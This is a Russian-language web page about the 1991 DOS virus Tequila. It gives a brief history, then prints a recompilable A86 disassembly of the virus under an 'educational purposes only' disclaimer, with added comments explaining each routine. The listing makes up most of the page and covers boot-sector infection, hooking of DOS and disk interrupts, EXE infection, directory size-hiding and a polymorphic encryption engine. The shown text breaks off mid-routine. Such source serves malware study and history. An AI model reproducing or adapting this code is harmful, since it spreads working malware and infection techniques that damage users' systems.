Исходники вирусов. DOS вирус Tequila


Tequila — полиморфный резидентный загрузочный компьютерный вирус, созданный под ОС MS-DOS. Зловред заражает загрузочный сектор диска ПК, что позволяет ему получать управление при запуске компьютера. Он остаётся в памяти (является резидентным) и заражает исполняемые файлы с расширением .exe (размер инфицированных программ увеличивается на 2,468 байт). При этом он не заражает файлы, в названиях которых есть «v» или «sc» (предположительно, чтобы избежать «атаки» антивирусов).

Вирус также нашпигован защитными механизмами — полиморфизм, антиотладка, шифрование. После того как в ОС будет заражена четверть всех программ, компьютерный вирус Tequila «выдаёт» своё присутствие выводом на консоль сообщения:

 

Welcome to T.TEQUILA's latest production.
Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/Switzerland
Loving thoughts to L.I.N.D.A
  
BEER and TEQUILA forever !
  
Execute: mov ax, FE03 / int 21. Key to go on!

 

Также зловред выводит на экран изображение фрактала Мандельброта.

 

Программа была создана швейцарским программистом в исследовательских целях. Однако программа (исходник или заражённый файл) была похищена и «выпущена» на компьютере одного из сотрудников компании, занимающейся разработкой компьютерных программ. В результате в начале 1991 года в Европе разразилась эпидемия этого вируса. Позже, в 1993 году, эпидемия этого зловреда повторилась в Южной Африке.

 

Исходник вируса Tequila

 

! Внимание. Код приводится исключительно в образовательных целях !

 

 

;=============================

; the tequila virus =

; a recompilable =

; dis-assembly =

; specifically designed =

; for assembly to a COM file =

; with the A86 assembler. =

; ++++++++++++++++++ =

; If you desire a "perfect" =

; byte for byte source code =

;match-up, the MASM assembler=

; must be used and the noted =

;instructions must be changed=

; to comply with MASM syntax.=

; In addition, all byte and =

;word pointer references must=

; be changed from B and W to =

; BYTE POINTER and WORD =

; POINTER. =

;=============================

CODE_SEG SEGMENT

ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG

ORG 0100

TEQUILA PROC NEAR

JMP START

DB 000, 000, 000, 000, 000, 000, 000, 0FFH, 0FFH

DB 009, 005, 001H, 010H, 000, 000, 002H, 0FAH, 000, 00CH

DB 00DH, 00AH, 00DH, 00AH

DB "Welcome to T.TEQUILA's latest production.", 00DH, 00AH

DB "Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/"

DB "Switzerland.", 00DH, 00AH

DB "Loving thoughts to L.I.N.D.A", 00DH, 00AH, 00DH, 00AH

DB "BEER and TEQUILA forever !", 00DH, 00AH, 00DH, 00AH

DB "$"

DB "Execute: mov ax, FE03 / int 21. Key to go on!"

PROGRAM_TERMINATION_ROUTINE:

PUSH BP

MOV BP,SP

SUB SP,0CH

PUSH AX

PUSH BX

PUSH CX

PUSH DX

PUSH SI

PUSH DI

PUSH ES

PUSH DS

PUSH CS

POP DS

MOV AX,W[6]

INC AX

JE 0243H ;Masm Mod. Needed

DEC AX

JNE 020DH ;Masm Mod. Needed

DEC W[8] ;Masm Mod. Needed

JNE 0243H ;Masm Mod. Needed

JMP 0246H ;Masm Mod. Needed

MOV AH,02AH

CALL INT_21

MOV SI,CX

MOV CX,W[8]

CMP CL,DL

JNE 022FH ;Masm Mod. Needed

MOV AX,SI

SUB AX,W[6]

MUL B[011H] ;Masm Mod. Needed

ADD AL,DH

ADD CH,3

CMP AL,CH

JAE 0237H ;Masm Mod. Needed

MOV W[6],0FFFFH ;Masm Mod. Needed

JMP 0243H ;Masm Mod. Needed

MOV W[6],0 ;Masm Mod. Needed

MOV W[8],3 ;Masm Mod. Needed

JMP 02DF ;Masm Mod. Needed

MOV BX,0B800H

INT 011

AND AX,030H

CMP AX,030H

JNE 0256H ;Masm Mod. Needed

MOV BX,0B000H

MOV ES,BX

XOR BX,BX

MOV DI,0FD8FH

MOV SI,0FC18H

MOV W[BP-2],SI

MOV W[BP-4],DI

MOV CX,01E

MOV AX,W[BP-2]

IMUL AX

MOV W[BP-8],AX

MOV W[BP-6],DX

MOV AX,W[BP-4]

IMUL AX

MOV W[BP-0C],AX

MOV W[BP-0A],DX

ADD AX,W[BP-8]

ADC DX,W[BP-6]

CMP DX,0F

JAE 02B0 ;Masm Mod. Needed

MOV AX,W[BP-2]

IMUL W[BP-4]

IDIV W[0F] ;Masm Mod. Needed

ADD AX,DI

MOV W[BP-4],AX

MOV AX,W[BP-8]

MOV DX,W[BP-6]

SUB AX,W[BP-0C]

SBB DX,W[BP-0A]

IDIV W[0D] ;Masm Mod. Needed

ADD AX,SI

MOV W[BP-2],AX

LOOP 0269 ;Masm Mod. Needed

INC CX

SHR CL,1

MOV CH,CL

MOV CL,0DB

ES MOV W[BX],CX ;Masm Mod. Needed

INC BX

INC BX

ADD SI,012

CMP SI,01B8

JL 0260 ;Masm Mod. Needed

ADD DI,034

CMP DI,02A3

JL 025D ;Masm Mod. Needed

XOR DI,DI

MOV SI,0BB

MOV CX,02D

CLD

MOVSB

INC DI

LOOP 02D7 ;Masm Mod. Needed

XOR AX,AX

INT 016

POP DS

POP ES

POP DI

POP SI

POP DX

POP CX

POP BX

POP AX

MOV SP,BP

POP BP

RET

;-----------------------------------------------------------------------
; PRINT_MESSAGE - print the '$'-terminated banner with DOS function 09h.
; In:    nothing (DS is forced to CS for the duration of the call)
; Out:   DX and DS restored; AX is not preserved
; Note:  called from the AX=FE03h branch of INT_21_INTERCEPT. DX=012 is a
;        fixed offset inside the code segment - presumably the CR/LF bytes
;        just ahead of the "Welcome to..." text in the resident copy;
;        confirm against the assembled image. The "Execute: ..." line sits
;        after the '$' terminator, so this call does not print it.
;-----------------------------------------------------------------------
PRINT_MESSAGE:

PUSH DX

PUSH DS

PUSH CS

POP DS                          ; DS = CS, the string lives in this segment

MOV AH,9                        ; DOS 09h: write '$'-terminated string at DS:DX

MOV DX,012

CALL INT_21                     ; goes through the saved original INT 21h vector

POP DS

POP DX

RET

NEW_PARTITION_TABLE:

CLI

XOR BX,BX

MOV DS,BX

MOV SS,BX

MOV SP,07C00

STI

XOR DI,DI

SUB W[0413],3 ;Masm Mod. Needed

INT 012

MOV CL,6

SHL AX,CL

MOV ES,AX

PUSH ES

MOV AX,022A

PUSH AX

MOV AX,0205

MOV CX,W[07C30]

INC CX

MOV DX,W[07C32]

INT 013

RETF

DB 002, 0FE

DB 04C, 0E9

DB 080, 004

PUSH CS

POP DS

XOR AX,AX

MOV ES,AX

MOV BX,07C00

PUSH ES

PUSH BX

MOV AX,0201

MOV CX,W[0226]

MOV DX,W[0228]

INT 013

PUSH CS

POP ES

CLD

MOV SI,0409

MOV DI,09BE

MOV CX,046

REP MOVSB

MOV SI,091B

MOV DI,0A04

MOV CX,045

REP MOVSB

CLI

XOR AX,AX

MOV ES,AX

ES LES BX,[070] ;Masm Mod. Needed

MOV W[09B0],BX ;Masm Mod. Needed

MOV W[09B2],ES ;Masm Mod. Needed

MOV ES,AX

ES LES BX,[084] ;Masm Mod. Needed

MOV W[09B4],BX ;Masm Mod. Needed

MOV W[09B6],ES ;Masm Mod. Needed

MOV ES,AX

ES MOV W[070],044F ;Masm Mod. Needed

ES MOV W[072],DS ;Masm Mod. Needed

STI

RETF

INSTALL:

CALL NEXT_LINE

NEXT_LINE:

POP SI

SUB SI,028F

PUSH SI

PUSH AX

PUSH ES

PUSH CS

POP DS

MOV AX,ES

ADD W[SI+2],AX

ADD W[SI+4],AX

DEC AX

MOV ES,AX

MOV AX,0FE02

INT 021

CMP AX,01FD

JE NO_PARTITION_INFECTION

ES CMP B[0],05A ;Masm Mod. Needed

JNE NO_PARTITION_INFECTION

ES CMP W[3],0BB ;Masm Mod. Needed

JBE NO_PARTITION_INFECTION

ES MOV AX,W[012] ;Masm Mod. Needed

SUB AX,0BB

MOV ES,AX

XOR DI,DI

MOV CX,09A4

CLD

REP MOVSB

PUSH ES

POP DS

CALL INFECT_PARTITION_TABLE

NO_PARTITION_INFECTION:

POP ES

POP AX

PUSH ES

POP DS

POP SI

CS MOV SS,W[SI+4] ;Masm Mod. Needed

CHAIN_TO_THE_HOST_FILE:

CS JMP D[SI] ;Masm Mod. Needed

INFECT_PARTITION_TABLE:

MOV AH,02A

INT 021

MOV W[6],CX ;Masm Mod. Needed

MOV W[8],DX ;Masm Mod. Needed

MOV AH,052

INT 021

ES MOV AX,W[BX-2] ;Masm Mod. Needed

MOV W[03E8],AX ;Masm Mod. Needed

MOV AX,03513

INT 021

MOV W[09A0],BX ;Masm Mod. Needed

MOV W[09A2],ES ;Masm Mod. Needed

MOV AX,03501

INT 021

MOV SI,BX

MOV DI,ES

MOV AX,02501

MOV DX,03DA

INT 021

MOV B[0A],0 ;Masm Mod. Needed

PUSHF

POP AX

OR AX,0100

PUSH AX

POPF

MOV AX,0201

MOV BX,09A4

MOV CX,1

MOV DX,080

PUSH DS

POP ES

PUSHF

CALL D[09A0] ;Masm Mod. Needed

PUSHF

POP AX

AND AX,0FEFF

PUSH AX

POPF

PUSHF

MOV AX,02501

MOV DX,SI

MOV DS,DI

INT 021

POPF

JAE 0450 ;Masm Mod. Needed

JMP RET ;Masm Mod. Needed

PUSH ES

POP DS

CMP W[BX+02E],0FE02

JNE 045C ;Masm Mod. Needed

JMP RET ;Masm Mod. Needed

ADD BX,01BE

MOV CX,4

MOV AL,B[BX+4]

CMP AL,4

JE 0479 ;Masm Mod. Needed

CMP AL,6

JE 0479 ;Masm Mod. Needed

CMP AL,1

JE 0479 ;Masm Mod. Needed

ADD BX,010

LOOP 0463 ;Masm Mod. Needed

JMP SHORT RET ;Masm Mod. Needed

MOV DL,080

MOV DH,B[BX+5]

MOV W[0228],DX ;Masm Mod. Needed

MOV AX,W[BX+6]

MOV CX,AX

MOV SI,6

AND AX,03F

CMP AX,SI

JBE RET ;Masm Mod. Needed

SUB CX,SI

MOV DI,BX

INC CX

MOV W[0226],CX ;Masm Mod. Needed

MOV AX,0301

MOV BX,09A4

PUSHF

CALL D[09A0] ;Masm Mod. Needed

JB RET ;Masm Mod. Needed

DEC CX

MOV W[DI+6],CX

INC CX

SUB W[DI+0C],SI

SBB W[DI+0E],0

MOV AX,0305

MOV BX,0

INC CX

PUSHF

CALL D[09A0] ;Masm Mod. Needed

JB RET ;Masm Mod. Needed

MOV SI,01F6

MOV DI,09A4

MOV CX,034

CLD

REP MOVSB

MOV AX,0301

MOV BX,09A4

MOV CX,1

XOR DH,DH

PUSHF

CALL D[09A0] ;Masm Mod. Needed

RET

NEW_INTERRUPT_ONE:

PUSH BP

MOV BP,SP

CS CMP B[0A],1 ;Masm Mod. Needed

JE 0506 ;Masm Mod. Needed

CMP W[BP+4],09B4

JA 050B ;Masm Mod. Needed

PUSH AX

PUSH ES

LES AX,[BP+2]

CS MOV W[09A0],AX ;Masm Mod. Needed

CS MOV W[09A2],ES ;Masm Mod. Needed

CS MOV B[0A],1

POP ES

POP AX

AND W[BP+6],0FEFF

POP BP

IRET

NEW_INTERRUPT_13:

CMP CX,1

JNE 054E ;Masm Mod. Needed

CMP DX,080

JNE 054E ;Masm Mod. Needed

CMP AH,3

JA 054E ;Masm Mod. Needed

CMP AH,2

JB 054E ;Masm Mod. Needed

PUSH CX

PUSH DX

DEC AL

JE 0537 ;Masm Mod. Needed

PUSH AX

PUSH BX

ADD BX,0200

INC CX

PUSHF

CS CALL D[09A0] ;Masm Mod. Needed

POP BX

POP AX

MOV AL,1

CS MOV CX,W[0226] ;Masm Mod. Needed

CS MOV DX,W[0228] ;Masm Mod. Needed

PUSHF

CS CALL D[09A0] ;Masm Mod. Needed

POP DX

POP CX

RETF 2

CS JMP D[09A0] ;Masm Mod. Needed

NEW_TIMER_TICK_INTERRUPT:

PUSH AX

PUSH BX

PUSH ES

PUSH DS

XOR AX,AX

MOV ES,AX

PUSH CS

POP DS

ES LES BX,[084] ;Masm Mod. Needed

MOV AX,ES

CMP AX,0800

JA 05B0 ;Masm Mod. Needed

CMP AX,W[09B6]

JNE 0575 ;Masm Mod. Needed

CMP BX,W[09B4]

JE 05B0 ;Masm Mod. Needed

MOV W[09B4],BX ;Masm Mod. Needed

MOV W[09B6],ES ;Masm Mod. Needed

XOR AX,AX

MOV DS,AX

CS LES BX,[09B0] ;Masm Mod. Needed

MOV W[070],BX ;Masm Mod. Needed

MOV W[072],ES ;Masm Mod. Needed

LES BX,[04C] ;Masm Mod. Needed

CS MOV W[09A0],BX ;Masm Mod. Needed

CS MOV W[09A2],ES ;Masm Mod. Needed

MOV W[04C],09BE ;Masm Mod. Needed

MOV W[04E],CS ;Masm Mod. Needed

MOV W[084],04B1 ;Masm Mod. Needed

MOV W[086],CS ;Masm Mod. Needed

POP DS

POP ES

POP BX

POP AX

IRET

;-----------------------------------------------------------------------
; INT_21_INTERCEPT - resident filter in front of the DOS INT 21h services.
; (Presumably the routine the INT 21h vector at 0:84h is pointed at by the
; timer-tick code elsewhere in this file - confirm against the listing.)
; Numbers are hex (A86 leading-zero notation). Dispatch on AH/AX:
;   AH=11h/12h  FCB find first/next    -> ADJUST_FCB_MATCHES, RETF 2
;   AH=4Eh/4Fh  handle find first/next -> ADJUST_HANDLE_MATCHES, RETF 2
;   AX=FE02h    private residency query -> AX=01FDh, IRET
;   AX=FE03h    private banner request  -> PRINT_MESSAGE when CS:[6] == 0
;   AX=4B00h    load-and-execute        -> INFECT_THE_FILE, then chain
;   AH=4Ch      terminate               -> PROGRAM_TERMINATION_ROUTINE, chain
;   anything else                       -> chain to the saved handler
; Analyst notes: the FE02h -> 01FDh reply is exactly the value INSTALL
; compares against, so it doubles as an in-memory presence indicator.
; The two "find" branches are the directory size-hiding path.
;-----------------------------------------------------------------------
INT_21_INTERCEPT:

CMP AH,011

JB CHECK_FOR_HANDLE

CMP AH,012

JA CHECK_FOR_HANDLE

CALL ADJUST_FCB_MATCHES         ; performs the real call, then edits the result

RETF 2                          ; far return that discards the caller's saved FLAGS

CHECK_FOR_HANDLE:

CMP AH,04E

JB CHECK_FOR_PREVIOUS_INSTALLATION

CMP AH,04F

JA CHECK_FOR_PREVIOUS_INSTALLATION

CALL ADJUST_HANDLE_MATCHES      ; performs the real call, then edits the result

RETF 2                          ; far return that discards the caller's saved FLAGS

CHECK_FOR_PREVIOUS_INSTALLATION:

CMP AX,0FE02

JNE CHECK_FOR_MESSAGE_PRINT

NOT AX                          ; FE02h -> 01FDh, the reply INSTALL checks for

IRET

CHECK_FOR_MESSAGE_PRINT:

CMP AX,0FE03

JNE CHECK_FOR_EXECUTE

; CS:[6] is a state word written elsewhere in this file; the banner is only
; printed while it is zero, otherwise the request is passed on to DOS.
CS CMP W[6],0 ;Masm Mod. Needed

JNE CHAIN_TO_TRUE_INT_21

CALL PRINT_MESSAGE

IRET

CHECK_FOR_EXECUTE:

CMP AX,04B00

JE SET_STACK

CMP AH,04C

JNE CHAIN_TO_TRUE_INT_21

SET_STACK:

; Save the caller's SS:SP and switch to a private stack inside this segment.
CS MOV W[09A6],SP ;Masm Mod. Needed

CS MOV W[09A8],SS ;Masm Mod. Needed

CLI                             ; no interrupts while SS:SP are inconsistent

PUSH CS

POP SS

MOV SP,0AE5

STI

CMP AH,04C

JNE TO_AN_INFECTION

CALL PROGRAM_TERMINATION_ROUTINE ; AH=4Ch path

JMP SHORT NO_INFECTION

TO_AN_INFECTION:

CALL INFECT_THE_FILE            ; AX=4B00h path

NO_INFECTION:

CLI

; Restore the caller's stack saved at SET_STACK.
CS MOV SS,W[09A8] ;Masm Mod. Needed

CS MOV SP,W[09A6] ;Masm Mod. Needed

STI

JMP SHORT CHAIN_TO_TRUE_INT_21  ; target is the very next label

CHAIN_TO_TRUE_INT_21:

; Running count of chained calls; ENCRYPT_AND_WRITE_TO_FILE reads this word.
CS INC W[09BC] ;Masm Mod. Needed

; Far jump through the INT 21h vector that was saved at CS:[09B4].
CS JMP D[09B4] ;Masm Mod. Needed

;-----------------------------------------------------------------------
; NEW_CRITICAL_ERROR_HANDLER - replacement INT 24h handler.
; Out:   AL = 3, the INT 24h "fail the call" reply
; Note:  INFECT_THE_FILE saves the previous INT 24h vector, installs a
;        handler with AX=2524h and restores the old one afterwards;
;        presumably the offset it installs is this routine. The visible
;        effect is that a disk error during that window fails quietly
;        instead of raising the DOS critical-error prompt.
;-----------------------------------------------------------------------
NEW_CRITICAL_ERROR_HANDLER:

MOV AL,3

IRET

;-----------------------------------------------------------------------
; ADJUST_FCB_MATCHES - size-hiding for FCB find first/next (AH=11h/12h).
; In:    AX and the other registers as set by the program issuing the call
; Out:   AX and FLAGS as returned by the real DOS call; BX, ES restored
; What it does: asks DOS for the DTA address, runs the caller's request
; through the saved INT 21h vector, and if the returned entry carries the
; marker (low five bits of the time field all set, i.e. 1Fh) subtracts
; 09A4h (2468) from the 32-bit file size in the result.
; Analyst notes: INFECT_THE_FILE sets the same 1Fh bits in the file time,
; so that time value plus a 2468-byte size difference between a resident
; and a clean-boot directory listing are the indicators visible here.
; The numeric jump targets are absolute offsets in the assembled image;
; presumably 064F is the marker test and 0664 the register restore.
;-----------------------------------------------------------------------
ADJUST_FCB_MATCHES:

PUSH BX

PUSH ES

PUSH AX

MOV AH,02F                      ; DOS 2Fh: get DTA address into ES:BX

CALL INT_21

POP AX                          ; caller's original function number

PUSHF                           ; PUSHF + far CALL imitates an INT frame

CS CALL D[09B4] ;Masm Mod. Needed

PUSHF                           ; keep the real call's FLAGS for the caller

PUSH AX

CMP AL,0FF                      ; AL=FFh: no entry returned, nothing to edit

JE 0664 ;Masm Mod. Needed

; First DTA byte FFh marks an extended FCB; its 7-byte prefix is skipped.
ES CMP B[BX],0FF ;Masm Mod. Needed

JNE 064F ;Masm Mod. Needed

ADD BX,7

; Low byte of the entry's time field.
ES MOV AL,B[BX+017] ;Masm Mod. Needed

AND AL,01F

CMP AL,01F                      ; marker present?

JNE 0664 ;Masm Mod. Needed

; 32-bit subtract of 09A4h from the reported file size (low word, then borrow).
ES SUB W[BX+01D],09A4 ;Masm Mod. Needed

ES SBB W[BX+01F],0 ;Masm Mod. Needed

POP AX

POPF

POP ES

POP BX

RET

;-----------------------------------------------------------------------
; ADJUST_HANDLE_MATCHES - size-hiding for find first/next (AH=4Eh/4Fh).
; In:    AX and the other registers as set by the program issuing the call
; Out:   AX and FLAGS as returned by the real DOS call; BX, ES restored
; Same scheme as ADJUST_FCB_MATCHES with the offsets of the handle-style
; find record: time low byte at DTA+16h, 32-bit size at DTA+1Ah. When the
; low five bits of the time are all set, 09A4h (2468) is subtracted from
; the size that the caller sees.
; The numeric target 0691 is an absolute offset in the assembled image;
; presumably the register restore at the end of this routine.
;-----------------------------------------------------------------------
ADJUST_HANDLE_MATCHES:

PUSH BX

PUSH ES

PUSH AX

MOV AH,02F                      ; DOS 2Fh: get DTA address into ES:BX

CALL INT_21

POP AX                          ; caller's original function number

PUSHF                           ; PUSHF + far CALL imitates an INT frame

CS CALL D[09B4] ;Masm Mod. Needed

PUSHF                           ; keep the real call's FLAGS for the caller

PUSH AX

; Carry still reflects the DOS call (PUSHF/PUSH leave FLAGS alone): on
; error there is no record to edit.
JB 0691 ;Masm Mod. Needed

ES MOV AL,B[BX+016] ;Masm Mod. Needed

AND AL,01F

CMP AL,01F                      ; marker present?

JNE 0691 ;Masm Mod. Needed

; 32-bit subtract of 09A4h from the reported file size (low word, then borrow).
ES SUB W[BX+01A],09A4 ;Masm Mod. Needed

ES SBB W[BX+01C],0 ;Masm Mod. Needed

POP AX

POPF

POP ES

POP BX

RET

WRITE_TO_THE_FILE:

MOV AH,040

JMP 069C ;Masm Mod. Needed

READ_FROM_THE_FILE:

MOV AH,03F

CALL 06B4 ;Masm Mod. Needed

JB RET ;Masm Mod. Needed

SUB AX,CX

RET

MOVE_TO_END_OF_FILE:

XOR CX,CX

XOR DX,DX

MOV AX,04202

JMP 06B4 ;Masm Mod. Needed

MOVE_TO_BEGINNING_OF_FILE:

XOR CX,CX

XOR DX,DX

MOV AX,04200

CS MOV BX,W[09A4] ;Masm Mod. Needed

;-----------------------------------------------------------------------
; INT_21 - issue a DOS request through the saved original INT 21h vector
; (far pointer at CS:[09B4]) instead of executing an INT 21h instruction,
; so the request does not pass through INT_21_INTERCEPT again.
; In:    AH/AX and other registers as the DOS function requires
; Out:   registers and FLAGS as left by the original handler
; Note:  MOVE_TO_BEGINNING_OF_FILE falls through into this label.
;-----------------------------------------------------------------------
INT_21:

CLI

PUSHF                           ; PUSHF + far CALL imitates an INT frame

CS CALL D[09B4] ;Masm Mod. Needed

RET

INFECT_THE_FILE:

PUSH AX

PUSH BX

PUSH CX

PUSH DX

PUSH SI

PUSH DI

PUSH ES

PUSH DS

CALL CHECK_LETTERS_IN_FILENAME

JAE GOOD_NAME

JMP BAD_NAME

GOOD_NAME:

PUSH DX

PUSH DS

PUSH CS

POP DS

SAVE_AND_REPLACE_CRITICAL_ERROR_HANDLER:

MOV AX,03524

CALL INT_21

MOV W[09B8],BX ;Masm Mod. Needed

MOV W[09BA],ES ;Masm Mod. Needed

MOV AX,02524

MOV DX,052A

CALL INT_21

POP DS

POP DX

SAVE_AND_REPLACE_FILE_ATTRIBUTE:

MOV AX,04300

CALL INT_21

CS MOV W[09AA],CX ;Masm Mod. Needed

JAE 06FE ;Masm Mod. Needed

JMP RESTORE_CRIT_HANDLER

MOV AX,04301

XOR CX,CX

CALL INT_21

JB 077C ;Masm Mod. Needed

OPEN_FILE_FOR_READ_WRITE:

MOV AX,03D02

CALL INT_21

JB 0771 ;Masm Mod. Needed

PUSH DX

PUSH DS

PUSH CS

POP DS

MOV W[09A4],AX ;Masm Mod. Needed

GET_FILEDATE:

MOV AX,05700

CALL 06B4 ;Masm Mod. Needed

JB 075C ;Masm Mod. Needed

MOV W[09AC],DX ;Masm Mod. Needed

MOV W[09AE],CX ;Masm Mod. Needed

READ_AND_CHECK_EXE_HEADER:

CALL 06AD ;Masm Mod. Needed

MOV DX,0A49

MOV CX,01C

CALL 069A ;Masm Mod. Needed

JB 075C ;Masm Mod. Needed

PUSH DS

POP ES

MOV DI,0E8

MOV CX,020

CMP W[0A49],05A4D ;Masm Mod. Needed

JNE 075C ;Masm Mod. Needed

MOV AX,W[0A5B]

CLD

REPNE SCASW

JNE 0754 ;Masm Mod. Needed

OR W[09AE],01F ;Masm Mod. Needed

JMP 075C ;Masm Mod. Needed

CALL READ_PAST_END_OF_FILE

JB 075C ;Masm Mod. Needed

CALL ENCRYPT_AND_WRITE_TO_FILE

RESTORE_ALTERED_DATE:

MOV AX,05701

MOV DX,W[09AC]

MOV CX,W[09AE]

CALL 06B4 ;Masm Mod. Needed

CLOSE_THE_FILE:

MOV AH,03E

CALL 06B4 ;Masm Mod. Needed

RESTORE_FILE_ATTRIBUTE:

POP DS

POP DX

MOV AX,04301

CS MOV CX,W[09AA] ;Masm Mod. Needed

CALL INT_21

RESTORE_CRIT_HANDLER:

MOV AX,02524

CS LDS DX,[09B8] ;Masm Mod. Needed

CALL INT_21

BAD_NAME:

POP DS

POP ES

POP DI

POP SI

POP DX

POP CX

POP BX

POP AX

RET

;-----------------------------------------------------------------------
; CHECK_LETTERS_IN_FILENAME - decide whether a file name is to be skipped.
; In:    DS:DX = zero-terminated name (presumably the path passed to the
;        intercepted AX=4B00h call - confirm against the caller)
; Out:   CF = 1 if the name contains the byte pair "SC" or the byte "V",
;        CF = 0 otherwise (the caller proceeds only when CF = 0)
; Clobb: AX, CX, SI, DI, ES, direction flag cleared
; Note:  the comparison is against the upper-case byte values only. The
;        page text suggests the intent is to leave antivirus programs
;        alone; the code itself only shows the substring test.
;        Numeric targets are absolute offsets in the assembled image;
;        presumably 07A5 is the SCASW and 07B7 the STC/RET pair.
;-----------------------------------------------------------------------
CHECK_LETTERS_IN_FILENAME:

PUSH DS

POP ES                          ; SCAS instructions address ES:DI

MOV DI,DX

MOV CX,-1

XOR AL,AL

CLD

REPNE SCASB                     ; find the terminating zero byte

NOT CX                          ; CX = name length including the terminator

MOV DI,DX

MOV AX,04353                    ; bytes 53h,43h in memory order = "SC"

MOV SI,CX                       ; keep the length for the second pass

SCASW                           ; compare two bytes at ES:DI with "SC"

JE 07B7 ;Masm Mod. Needed

DEC DI                          ; SCASW advanced by 2; step back to move 1 byte

LOOP 07A5 ;Masm Mod. Needed

MOV CX,SI

MOV DI,DX

MOV AL,056                      ; 56h = 'V'

REPNE SCASB

JE 07B7 ;Masm Mod. Needed

CLC                             ; neither pattern found

RET

STC                             ; pattern found: tell the caller to skip

RET

READ_PAST_END_OF_FILE:

MOV CX,-1

MOV DX,-0A

CALL 06A8 ;Masm Mod. Needed

MOV DX,0A65

MOV CX,8

CALL 069A ;Masm Mod. Needed

JB RET ;Masm Mod. Needed

CMP W[0A65],0FDF0 ;Masm Mod. Needed

JNE 07F0 ;Masm Mod. Needed

CMP W[0A67],0AAC5 ;Masm Mod. Needed

JNE 07F0 ;Masm Mod. Needed

MOV CX,-1

MOV DX,-9

CALL 06A8 ;Masm Mod. Needed

MOV DX,0A6B

MOV CX,4

CALL 0696 ;Masm Mod. Needed

RET

CLC

RET

ENCRYPT_AND_WRITE_TO_FILE:

CALL MOVE_TO_END_OF_FILE

MOV SI,AX

MOV DI,DX

MOV BX,0A49

MOV AX,W[BX+4]

MUL W[0D] ;Masm Mod. Needed

SUB AX,SI

SBB DX,DI

JAE 080C ;Masm Mod. Needed

JMP OUT_OF_ENCRYPT

MOV AX,W[BX+8]

MUL W[0B] ;Masm Mod. Needed

SUB SI,AX

SBB DI,DX

MOV AX,W[BX+0E]

MOV W[4],AX ;Masm Mod. Needed

ADD W[4],010 ;Masm Mod. Needed

MUL W[0B] ;Masm Mod. Needed

ADD AX,W[BX+010]

SUB AX,SI

SBB DX,DI

JB 083C ;Masm Mod. Needed

SUB AX,080

SBB DX,0

JB RET ;Masm Mod. Needed

ADD W[BX+0E],09B

MOV AX,W[BX+016]

ADD AX,010

MOV W[2],AX ;Masm Mod. Needed

MOV AX,W[BX+014]

MOV W[0],AX ;Masm Mod. Needed

CALL 06A4 ;Masm Mod. Needed

ADD AX,09A4

ADC DX,0

DIV W[0D] ;Masm Mod. Needed

INC AX

MOV W[0A4D],AX ;Masm Mod. Needed

MOV W[0A4B],DX ;Masm Mod. Needed

MOV DX,DI

MOV AX,SI

DIV W[0B] ;Masm Mod. Needed

MOV W[0A5F],AX ;Masm Mod. Needed

MOV BX,DX

ADD DX,0960

MOV W[0A5D],DX ;Masm Mod. Needed

CALL COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE

JB RET ;Masm Mod. Needed

OR W[09AE],01F ;Masm Mod. Needed

MOV BX,W[09BC]

AND BX,01F

SHL BX,1

MOV AX,W[BX+0E8]

MOV W[0A5B],AX ;Masm Mod. Needed

CALL MOVE_TO_BEGINNING_OF_FILE

MOV CX,01C

MOV DX,0A49

WRITE_THE_NEW_HEADER:

CALL 0696 ;Masm Mod. Needed

OUT_OF_ENCRYPT:

RET

COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE:

PUSH BP

XOR AH,AH

INT 01A

MOV AX,DX

MOV BP,DX

PUSH DS

POP ES

MOV DI,0960

MOV SI,DI

MOV CX,020

CLD

REP STOSW

XOR DX,DX

MOV ES,DX

CALL ENCRYPT_STEP_ONE

CALL ENCRYPT_STEP_TWO

CALL ENCRYPT_STEP_THREE

MOV B[SI],0E9

MOV DI,028C

SUB DI,SI

SUB DI,3

INC SI

MOV W[SI],DI

MOV AX,0A04

CALL AX

POP BP

RET

ENCRYPT_STEP_ONE:

DEC BP

ES TEST B[BP],2 ;Masm Mod. Needed

JNE 08EB ;Masm Mod. Needed

MOV B[SI],0E

INC SI

CALL GARBLER

MOV B[SI],01F

INC SI

CALL GARBLER

RET

MOV W[SI],0CB8C

INC SI

INC SI

CALL GARBLER

MOV W[SI],0DB8E

INC SI

INC SI

CALL GARBLER

RET

ENCRYPT_STEP_TWO:

AND CH,0FE

DEC BP

ES TEST B[BP],2 ;Masm Mod. Needed

JE 0920 ;Masm Mod. Needed

OR CH,1

MOV B[SI],0BE

INC SI

MOV W[SI],BX

INC SI

INC SI

CALL GARBLER

ADD BX,0960

TEST CH,1

JE 0934 ;Masm Mod. Needed

MOV B[SI],0BB

INC SI

MOV W[SI],BX

INC SI

INC SI

CALL GARBLER

ADD BX,0960

TEST CH,1

JE 090C ;Masm Mod. Needed

SUB BX,0960

CALL GARBLER

MOV B[SI],0B9

INC SI

MOV AX,0960

MOV W[SI],AX

INC SI

INC SI

CALL GARBLER

CALL GARBLER

RET

ENCRYPT_STEP_THREE:

MOV AH,014

MOV DH,017

TEST CH,1

JE 0958 ;Masm Mod. Needed

XCHG DH,AH

MOV DI,SI

MOV AL,08A

MOV W[SI],AX

INC SI

INC SI

CALL GARBLER

XOR DL,DL

MOV B[0A39],028 ;Masm Mod. Needed

DEC BP

ES TEST B[BP],2 ;Masm Mod. Needed

JE 0978 ;Masm Mod. Needed

MOV DL,030

MOV B[0A39],DL ;Masm Mod. Needed

MOV W[SI],DX

INC SI

INC SI

MOV W[SI],04346

INC SI

INC SI

CALL GARBLER

MOV AX,0FE81

MOV CL,0BE

TEST CH,1

JE 0993 ;Masm Mod. Needed

MOV AH,0FB

MOV CL,0BB

MOV W[SI],AX

INC SI

INC SI

PUSH BX

ADD BX,040

MOV W[SI],BX

INC SI

INC SI

POP BX

MOV B[SI],072

INC SI

MOV DX,SI

INC SI

CALL GARBLER

MOV B[SI],CL

INC SI

MOV W[SI],BX

INC SI

INC SI

MOV AX,SI

SUB AX,DX

DEC AX

MOV BX,DX

MOV B[BX],AL

CALL GARBLER

CALL GARBLER

MOV B[SI],0E2

INC SI

SUB DI,SI

DEC DI

MOV AX,DI

MOV B[SI],AL

INC SI

CALL GARBLER

RET

GARBLER:

DEC BP

ES TEST B[BP],0F ;Masm Mod. Needed

JE RET ;Masm Mod. Needed

DEC BP

ES MOV AL,B[BP] ;Masm Mod. Needed

TEST AL,2

